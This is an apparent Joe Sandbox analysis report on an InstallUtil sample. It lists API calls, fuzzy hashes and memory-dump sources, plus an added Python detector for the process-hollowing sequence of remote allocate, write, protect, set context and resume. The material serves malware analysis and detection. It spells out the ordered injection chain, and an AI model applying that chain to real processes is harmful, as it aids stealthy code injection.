                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:130
                                                                                                          Total number of Limit Nodes:8
execution_graph (API nodes reached from each entry point, as recoverable from the rendered graph):
• 7f91168: PostMessageW at 7f913e8 and 7f913e0
• 7f90ce8: Wow64SetThreadContext at 7f90d26
• 7f90268: VirtualAllocEx at 7f902a8
• 7f90a48: VirtualProtectEx at 7f90a90
• 7f905a8: WriteProcessMemory at 7f905f0
• 8424680: DeleteFileW at 842c343 and 842c3c8 (reached through 842bae0/842baf0, 842bc4a/842bc78, 842bfb0, 842bf77, 842c325 and 842b2b4)
• 7bad1c8: VirtualProtect at 7b769e0 (reached through 7b76992/7b76998 from 7b74d52, 7b76477, 7b754e7, 7b74a3b, 7b7553c, 7b74bed, 7b756cd and 7b74cf1)
• 7b7fb70: Wow64GetThreadContext at 7b7fbb5
• 7f935e0: CloseHandle at 7f937c0 (via 7f927f4)
• 7f90f50: ResumeThread at 7f90f90
• 7bae260: VirtualProtect at 7bae2a8
• 7b79149: CreateProcessAsUserW at 7b7e02f (via 7b7b720/7b7bc28 and 7b7dfb0)
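The execution graph above lists the API nodes the sample reaches: CreateProcessAsUserW, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, Wow64GetThreadContext/Wow64SetThreadContext and ResumeThread, which is the remote-injection (process hollowing) sequence behind the "Injects a PE file into a foreign processes" and "Allocates memory in foreign processes" signatures. The Python below is an added example and not part of the Joe Sandbox report: it turns that sequence into an ordered-subsequence detector over a per-process API trace. The trace format (one "<process index> <api name>" per line) and the sample lines are constructed for illustration, and the non-Wow64/Nt* aliases in each stage are an assumption about which variants an arbitrary trace might contain.

```python
"""Ordered-subsequence detector for the remote-injection API chain.

Added example, not part of the Joe Sandbox report. The stage API names come
from the execution graph above; the Nt*/non-Wow64 aliases are an assumption
about which variants an arbitrary trace might contain, and the trace format
(one "<process index> <api name>" per line) is constructed for illustration.
"""

# Stages of the remote-injection (process hollowing) chain, in the order the
# graph above shows them being reached. Each stage accepts any listed alias.
HOLLOWING_STAGES = (
    ("create_target", {"CreateProcessW", "CreateProcessA",
                       "CreateProcessAsUserW", "CreateProcessAsUserA"}),
    ("allocate_remote", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write_remote", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("protect_remote", {"VirtualProtectEx", "NtProtectVirtualMemory"}),
    ("set_context", {"SetThreadContext", "Wow64SetThreadContext",
                     "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
)

# Constructed trace: process index 0 performs the full chain, process index 7
# only touches its own memory and deletes files (no remote stage at all).
SAMPLE_TRACE = """\
0 PostMessageW
0 CreateProcessAsUserW
0 Wow64GetThreadContext
0 VirtualAllocEx
0 WriteProcessMemory
0 VirtualProtectEx
0 Wow64SetThreadContext
0 ResumeThread
0 CloseHandle
7 VirtualProtect
7 DeleteFileW
"""


def parse_trace(text):
    """Parse '<pid> <api>' lines into an ordered list of (pid, api) tuples."""
    trace = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, api = line.split(None, 1)
        trace.append((int(pid), api.strip()))
    return trace


def find_hollowing_chain(trace, min_stages=4):
    """Return {pid: [(stage_name, trace_index), ...]} for every process whose
    calls hit at least `min_stages` of HOLLOWING_STAGES in order.

    Matching is a greedy in-order subsequence: unrelated calls between stages
    are ignored, and a stage that never appears (e.g. the target was created
    by another process) is skipped rather than breaking the chain.
    """
    hits_by_pid = {}
    for pid in sorted({p for p, _ in trace}):
        stage_idx, hits = 0, []
        for i, (p, api) in enumerate(trace):
            if p != pid:
                continue
            for s in range(stage_idx, len(HOLLOWING_STAGES)):
                name, aliases = HOLLOWING_STAGES[s]
                if api in aliases:
                    hits.append((name, i))
                    stage_idx = s + 1
                    break
        if len(hits) >= min_stages:
            hits_by_pid[pid] = hits
    return hits_by_pid


if __name__ == "__main__":
    for pid, hits in find_hollowing_chain(parse_trace(SAMPLE_TRACE)).items():
        print(f"process {pid}: " + " -> ".join(f"{n}@{i}" for n, i in hits))
```

On the constructed trace only process 0 is reported, with all six stages in order. The threshold matters: debuggers and some installers legitimately call VirtualAllocEx, WriteProcessMemory and SetThreadContext, so a match of four stages that includes the resume step is a reasonable starting point for triage rather than a lone allocate/write pair.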

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
control_flow_graph: function at 85e4d2b spanning blocks 85e4d2b-85eaa04; the block ending at 85ea9f7 dispatches to one of 85ec2f8, 85ec308 or 85ec276 before continuing at 85ea9fd-85eaa04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5fc64cb449a271c1320aa97397c3cf442cf79a0c462418d74271060ee41a3271
                                                                                                          • Instruction ID: 6a1af994f6a554a7581538d49449a20ed5b0aa783c588eb6575f4ba243a7763e
                                                                                                          • Opcode Fuzzy Hash: 5fc64cb449a271c1320aa97397c3cf442cf79a0c462418d74271060ee41a3271
                                                                                                          • Instruction Fuzzy Hash: CCB30970A01229CBCB58EF38D9856ACBBF2FB89215F4044EDD449A7350DE355E89DF82

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
control_flow_graph: function at 85e4d40 spanning blocks 85e4d40-85eaa04 (same body as the 85e4d2b function above); the block ending at 85ea9f7 dispatches to one of 85ec2f8, 85ec308 or 85ec276 before continuing at 85ea9fd-85eaa04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ac23cbc0e17fb925f4126b36e4cd5b4c5b85218b6b79d8d33f8b12565cc5c6a
                                                                                                          • Instruction ID: c85d6a98de5d14784de53af720c6e5d425d352e4e26ab94682d9d7d17f8171a7
                                                                                                          • Opcode Fuzzy Hash: 8ac23cbc0e17fb925f4126b36e4cd5b4c5b85218b6b79d8d33f8b12565cc5c6a
                                                                                                          • Instruction Fuzzy Hash: 40B30970A01229CBCB58EF38D9856ACBBF2FB89215F4044EDD449A7350DE355E89DF82

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
control_flow_graph: function at 85e09b0 spanning blocks 85e09b0-85e181c; 85e0bfa calls 85e1938 or 85e1928, 85e0c13 calls 85e2a48 or 85e2a39, 85e0c41 calls one of 85e2a48, 85e2b68, 85e2be8, 85e2a39 or 85e2be7, and the block 85e1751-85e177c calls 85ed82b
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: G$Te^q$Te^q
                                                                                                          • API String ID: 0-3949708683
                                                                                                          • Opcode ID: fe22534b85d07783b358e02681b930268fa973fb3c2e99368533e3fb078bacea
                                                                                                          • Instruction ID: 8024ed0c5140778d360f87c7e9ee5c780c39f701a6f08097b43a003839f14fd3
                                                                                                          • Opcode Fuzzy Hash: fe22534b85d07783b358e02681b930268fa973fb3c2e99368533e3fb078bacea
                                                                                                          • Instruction Fuzzy Hash: C182FF30A04255CFDB05AF79CC94A5DBFB1FF89604F4585E9D088DB392DA389C4ACB52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$$^q$$^q
                                                                                                          • API String ID: 0-1611274095
                                                                                                          • Opcode ID: 013537bb1f85b37bca95ecc88578e24990bc7e6e84ceeb03cc7f6fac6108bf94
                                                                                                          • Instruction ID: 890eed944ad5c265eb79e09e546291365eb2d2baf55414bc020450431bde48ae
                                                                                                          • Opcode Fuzzy Hash: 013537bb1f85b37bca95ecc88578e24990bc7e6e84ceeb03cc7f6fac6108bf94
                                                                                                          • Instruction Fuzzy Hash: 37519C307442158FCB19EB7A986853E7BEBAFCEA403198469E407CF3A5DF25CC068795
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Ycq$Ycq$Ycq
                                                                                                          • API String ID: 0-1440525778
                                                                                                          • Opcode ID: 09a8e2c4fdaa92915313a9b9be9adcac87a1b2d0af8570578f9b9c896dee6b4a
                                                                                                          • Instruction ID: 197b690ce2e5a11853df34945a345d25ef21615ccda029c909ea8ab5bcb727d9
                                                                                                          • Opcode Fuzzy Hash: 09a8e2c4fdaa92915313a9b9be9adcac87a1b2d0af8570578f9b9c896dee6b4a
                                                                                                          • Instruction Fuzzy Hash: 6C51A030E04204CFCB18DAADC4547ADB7B6BF8E321F25842AD916A7385DB35DC82CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (o^q$4'^q
                                                                                                          • API String ID: 0-273632683
                                                                                                          • Opcode ID: be6a6187b8f7676b99582be0d178e56476f7bf450a2c12a650c99c3f2fb48ca4
                                                                                                          • Instruction ID: f13e6486c225ba4c6b7ccf086aaca7e22ec9b99a1f857d40b19333e12160aa6d
                                                                                                          • Opcode Fuzzy Hash: be6a6187b8f7676b99582be0d178e56476f7bf450a2c12a650c99c3f2fb48ca4
                                                                                                          • Instruction Fuzzy Hash: 00225D71A00209DFCB15DF68C984AAEBBF6FF8D314F198595E4069B2A1C731ED81CB61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq
                                                                                                          • API String ID: 0-4258043069
                                                                                                          • Opcode ID: 31871dd7e7312c10699e08db1dd1ecdf64af33319c250af7c372bd59c263573a
                                                                                                          • Instruction ID: 73e6d5817c50c1e7139bd3473e4f8faf673ab80c17cf9997d93270f12e7ee533
                                                                                                          • Opcode Fuzzy Hash: 31871dd7e7312c10699e08db1dd1ecdf64af33319c250af7c372bd59c263573a
                                                                                                          • Instruction Fuzzy Hash: 06E19B307002159FCB19DF28D858B6EBBAABB8E750F588469E506CB394DF34DC46CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: nKvq$nKvq
                                                                                                          • API String ID: 0-2223595353
                                                                                                          • Opcode ID: f4ff18daaf66d7c46281ef1deeffe0aa7e6519db4b8d708883ab23926a0718bc
                                                                                                          • Instruction ID: 0bb19bb03f52c13120cacccd4c912934f9f3b909601c7fada75bc0922ec8d234
                                                                                                          • Opcode Fuzzy Hash: f4ff18daaf66d7c46281ef1deeffe0aa7e6519db4b8d708883ab23926a0718bc
                                                                                                          • Instruction Fuzzy Hash: 80B11075E00606CFCB18DF68C49095EFBB2BF88321B158655E955AB356DB30EC86CBD0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: nKvq$nKvq
                                                                                                          • API String ID: 0-2223595353
                                                                                                          • Opcode ID: 593972b98716d06c93ceb24c35895ce59372b5e058dfc39f31043268c1fe297a
                                                                                                          • Instruction ID: 59810c8dc2c8b41ab40a8fcd8bf59226301cc4c068d6b586d6ef2222714698f6
                                                                                                          • Opcode Fuzzy Hash: 593972b98716d06c93ceb24c35895ce59372b5e058dfc39f31043268c1fe297a
                                                                                                          • Instruction Fuzzy Hash: 06B11B35E006068FCB08DF58C8909AEF7B6BF88311B158655E955AB35ADB30FC86CBD0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,bq$,bq
                                                                                                          • API String ID: 0-2699258169
                                                                                                          • Opcode ID: 63a9fd656e4b0638ca5eb16045e02df7095b2b48f2b9eaa4bc58bad20c33c2a8
                                                                                                          • Instruction ID: d127758850ec25f46a814ca4c0df536ae1b8d816b36834af117a38de92121010
                                                                                                          • Opcode Fuzzy Hash: 63a9fd656e4b0638ca5eb16045e02df7095b2b48f2b9eaa4bc58bad20c33c2a8
                                                                                                          • Instruction Fuzzy Hash: 93819174B009058FCB18DF6DD8849AAB7B6FF8E310B998169D406EB369DB31EC41CB51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: bafd2d8801c4e25df3d133c5c7554ba346a0f511d77bed9e6837986fa8c4b345
                                                                                                          • Instruction ID: 9ee951f5f1d302cf8fcb89612da88bb5005ad3f1c731d152145f4da2693efd43
                                                                                                          • Opcode Fuzzy Hash: bafd2d8801c4e25df3d133c5c7554ba346a0f511d77bed9e6837986fa8c4b345
                                                                                                          • Instruction Fuzzy Hash: F61100753442515FC7066B7CEC5496D3BEABFCA610B15009BE546CF3A2CE64CC0787A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 5f75f245895b543c4f408d86b954cdee51150a772c61176f7c6ef1f27c08a7be
                                                                                                          • Instruction ID: ea2fbac89d5ca510158164a782545eb3f9da8ab19b562645e2f95add84ab9088
                                                                                                          • Opcode Fuzzy Hash: 5f75f245895b543c4f408d86b954cdee51150a772c61176f7c6ef1f27c08a7be
                                                                                                          • Instruction Fuzzy Hash: 4DF0F6353401111FC608B77DE55893E76DBAFCDA24714405AE50ACF3A4CE64DC034796
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 69716d141aeadb8469d1dc709ba920a6925064e10ba632187d68cd9e22d28336
                                                                                                          • Instruction ID: 900442090156f7dbc6e739310c90d5a69c992a82599340081f38c5d0b14793b0
                                                                                                          • Opcode Fuzzy Hash: 69716d141aeadb8469d1dc709ba920a6925064e10ba632187d68cd9e22d28336
                                                                                                          • Instruction Fuzzy Hash: 5F125D70B102158BCB08FFB9D98866DBBF6FB88A08F50496CD489DB355DE349C09DB52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: be3d4c64c07b86724733888b32a352a858492d28cc59645f56de3cf1dbde01d3
                                                                                                          • Instruction ID: 17f258ad99590272c47673ccd683e53c419a047c5be03d374ce0a0d123cd687f
                                                                                                          • Opcode Fuzzy Hash: be3d4c64c07b86724733888b32a352a858492d28cc59645f56de3cf1dbde01d3
                                                                                                          • Instruction Fuzzy Hash: 7F025E70B102158BCB08FFB9D98866DBBF6FB88A08F50496CD449EB355DE349C09DB52
                                                                                                          APIs
                                                                                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07B7E11B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcessUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2217836671-0
                                                                                                          • Opcode ID: 408faf7a609a40073c9605962d6cb68046d9064f4097fba2ebcf26c350fcbe38
                                                                                                          • Instruction ID: 2597922b1f131298702b9fcea5eb3e2e6f1b36a05b442636674387f119d9093d
                                                                                                          • Opcode Fuzzy Hash: 408faf7a609a40073c9605962d6cb68046d9064f4097fba2ebcf26c350fcbe38
                                                                                                          • Instruction Fuzzy Hash: 3651F7B190026ADFDB24CF99C941BDDBBB5BF48310F0484EAE918B7250DB759A85CF90
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0842C438
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922177512.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_8420000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 882e46fbbacb506b6661e7e204282263389fa103aa5160dee4412f8ed112797b
                                                                                                          • Instruction ID: 2a23f7c2626a2d2f435ec01d64a9349bfccb5daecbe8aaab2459a48bd9b7bce8
                                                                                                          • Opcode Fuzzy Hash: 882e46fbbacb506b6661e7e204282263389fa103aa5160dee4412f8ed112797b
                                                                                                          • Instruction Fuzzy Hash: 9F518F7190D3D48FC712CBB8985479ABFB0AF07214F1941DBC595EB2A3D6785809C7A2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq
                                                                                                          • API String ID: 0-1245868
                                                                                                          • Opcode ID: 029573db09dbd82d7f97cbf2e8fe405cc02b65259d1b1ab87064476721544470
                                                                                                          • Instruction ID: 5019f163fc737d14a58f0e6ea8e40d8d0f145410753e2527810e41fe7ee06389
                                                                                                          • Opcode Fuzzy Hash: 029573db09dbd82d7f97cbf2e8fe405cc02b65259d1b1ab87064476721544470
                                                                                                          • Instruction Fuzzy Hash: 03C1D431B141158BDB08BBBDD84526EBBB6FBC8604F40496DE049DB354DE388C0AD3A6
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07F90638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 407ea006daf4e5473cb1deb2b3564f228688cda34093db42dcbbcbb2ef019e19
                                                                                                          • Instruction ID: 260b12ef711606907c133f289bdfd1a926653576a74f17ac7300d328a7b68801
                                                                                                          • Opcode Fuzzy Hash: 407ea006daf4e5473cb1deb2b3564f228688cda34093db42dcbbcbb2ef019e19
                                                                                                          • Instruction Fuzzy Hash: C42146B19002499FDB10CFA9C881BDEBBF1FB88310F14842AE559A7250D7749945CB64
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07F90638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: fe5be7d92a1c914e6ecaf90c9c3f64b39cd66fa5a54f13c737ddce44c1ae54bf
                                                                                                          • Instruction ID: 468cdbd90c281ca36ba1991843e764f20e037bf66d4b0edf3b4d61207de6d4fa
                                                                                                          • Opcode Fuzzy Hash: fe5be7d92a1c914e6ecaf90c9c3f64b39cd66fa5a54f13c737ddce44c1ae54bf
                                                                                                          • Instruction Fuzzy Hash: 1D2146B1900359DFDB10CFA9C881BDEBBF5FF88310F108429E958A7240D7789944CBA4
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07F90D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 403b91b740c73004fd931231190e1fb49766773a9bdca70b58a7c533a16df37a
                                                                                                          • Instruction ID: 8cdf372d7ede16f238f9a4bf1a65eeac71218db35aac511b6ddeebe034ea79c2
                                                                                                          • Opcode Fuzzy Hash: 403b91b740c73004fd931231190e1fb49766773a9bdca70b58a7c533a16df37a
                                                                                                          • Instruction Fuzzy Hash: A22128B1D002498FDB10DFAAC4857EEBBF0AF88324F14842ED559A7241CB78A985CF94
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07B7FBEE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 5c00c722bac7048a3f09749ad59bbcf19edf315ff76f3a6a79dbc862519b4cdd
                                                                                                          • Instruction ID: 5b797508d4eeb4e8bdb76f9ca65863a643ea7b6c9f7372d11bc8669b4fe13ff3
                                                                                                          • Opcode Fuzzy Hash: 5c00c722bac7048a3f09749ad59bbcf19edf315ff76f3a6a79dbc862519b4cdd
                                                                                                          • Instruction Fuzzy Hash: 882118B19002098FDB10DFAAC4857EEBBF4EF48324F14842AD559A7241D778A945CFA5
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07F90D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 4137740d09fe4c01463440532f7a85e151574978e73ada890b1b273a2e294c51
                                                                                                          • Instruction ID: 2546896ad3499be52805f6ab7ed501ea7ee9cdd5a2cc684068d183a4e57f0062
                                                                                                          • Opcode Fuzzy Hash: 4137740d09fe4c01463440532f7a85e151574978e73ada890b1b273a2e294c51
                                                                                                          • Instruction Fuzzy Hash: 8F2129B1D003098FDB10DFAAC4857EEBBF4EF88324F14842AD559A7241DB78A944CFA5
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07F90ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 120fe9f14e1f5345fc7465a8bff3b18575658c23b3e716fc5dddbe24b979b811
                                                                                                          • Instruction ID: 46a729d4e9ba4ed00110b33f4d8f62789e595c032787fe97798035575bc5e509
                                                                                                          • Opcode Fuzzy Hash: 120fe9f14e1f5345fc7465a8bff3b18575658c23b3e716fc5dddbe24b979b811
                                                                                                          • Instruction Fuzzy Hash: CE2168B1C002499FDB10DFAAC445BEEBBF0FF48320F14842AE459A7250C7789945CFA1
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07F90ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: feeaeff326e02633bfe046ef539789a9c9790426c86e921eb25ed2f55f4d32b1
                                                                                                          • Instruction ID: 5525f5b44784d5649ed4cf3cd9995b518dd34a26ee8aeed87f2b18d45ef5d824
                                                                                                          • Opcode Fuzzy Hash: feeaeff326e02633bfe046ef539789a9c9790426c86e921eb25ed2f55f4d32b1
                                                                                                          • Instruction Fuzzy Hash: 892135B18002499FDB10DFAAC844BEEBBF5FF48320F148829D559A7250CB78A944CFA1
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0842C438
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922177512.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_8420000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 6d3cc8b09a6a6d59f1f49bc3e1c7db93bf46023a25a84eb8a3e8fb6dd9094e53
                                                                                                          • Instruction ID: e37d5dbbe0f4f32e2711acecee1d683026d9e089ca7e8f64e7db8561de71bd44
